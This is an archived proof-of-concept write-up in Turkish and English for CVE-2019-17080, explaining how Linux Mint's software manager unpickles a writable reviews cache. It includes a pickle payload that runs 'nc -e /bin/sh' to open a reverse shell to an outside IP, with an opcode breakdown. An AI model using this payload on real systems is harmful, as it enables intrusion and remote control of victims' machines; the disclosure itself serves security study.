关联漏洞
描述
CVE-2019-17080
介绍
[TR] Linux mint yazılım yöneticisi (v 7.9.5/9) yanlış yapılandırmadan dolayı obje enjeksiyonu ve keyfi kod çalıştırmamıza neden olmaktadır.
[EN] Linux mint software manager (v 7.9.5/9) causes us to execute object injection and arbitrary code due to incorrect configuration
mintinsall
[TR] Mint yazılım yöneticisini çalıştırdıgımız da yeni yorum olup olmadıgını kontrol ediyor eger yeni yorum varsa [new-reviews.list](https://community.linuxmint.com/data/) adresinden indirip dosyaya yazıyor.
[EN] If there is a new comment [new-reviews.list](https://community.linuxmint.com/data/) download from and write to file.

code mintinstall.py
[TR] Yazılım yöneticisini ilk başladıgında , reviews modülünden ReviewCache() sınıfını çağırıyor.
[EN] When the software manager first starts, it calls the ReviewCache() class from the reviews module.

# Verileri Nasıl İşliyor?
# How Does It Process Data?
code reviews.py
[TR] ReviewCache sınıfı başladıgında(__init__) _load_cache() fonksiyonunu çagırıyor.
[EN] When the ReviewCache class starts (__init__) it calls _load_cache()

[TR] Load cache fonksiyonu REVIEWS_CACHE degişkeninde olan dosyayı okuyup pickle modülü yardımıyla dosyanın içinde ki datayı unserialize ediyor ve bazı değerleri hafıza da tutuyor.
[EN] The Load cache function reads the file in the REVIEWS_CACHE variable and unserializes the data in the file with the help of the pickle module and holds some values in memory.



[TR] Dosyayı kontrol ettigimde yazma iznim oldugu görünüyor.
[EN] When I check the file, it looks like I'm allowed to write.

[TR] [Pickle](https://docs.python.org/3.6/library/pickle.html) modülü yardımıyla serialize/unserialize işlemleri gerçekleştirebildigimizden, reduce metodu kullanarak modül dahil edip keyfi kod yürütebiliriz.
[EN] [Pickle](https://docs.python.org/3.6/library/pickle.html) since we can perform serialize/unserialize operations with the module, we can include the module and execute arbitrary code using the reduce method.

[TR] Bu durumda eğer dosya unserialize edilmeye çalışılırsa zararlı kodumuz çalışacaktır.
[EN] If you attempt to unserialize the file, our malicious code will work.
cos
system
(S'nc -e /bin/sh 192.168.2.138 4545'
tR.
>>modül adı c{os}
>> fonksiyon
( >> işaretleyici nesnesi
S >> tırnak sonuna kadar okuyup stack'e at
tR. >> stackte olanları çagır ve sonucu stacke yerleştir.


文件快照
[4.0K] /data/pocs/1b46440f8e424c9fe4ab95ed932110405c255ef2
├── [ 347] exploit.py
├── [4.0K] imgs
│ ├── [ 24K] 20190926-164424.png
│ ├── [ 11K] 20190926-165833.png
│ ├── [5.9K] 20190926-165855.png
│ ├── [ 15K] 20190926-170607.png
│ ├── [ 16K] 20190926-170651.png
│ ├── [4.6K] 20190926-171334.png
│ ├── [ 43K] 20190926-171938.png
│ ├── [ 14K] 20190927-113447.png
│ ├── [ 17K] 20190927-131940.png
│ └── [6.1M] exploit.gif
└── [2.7K] README.md
1 directory, 12 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。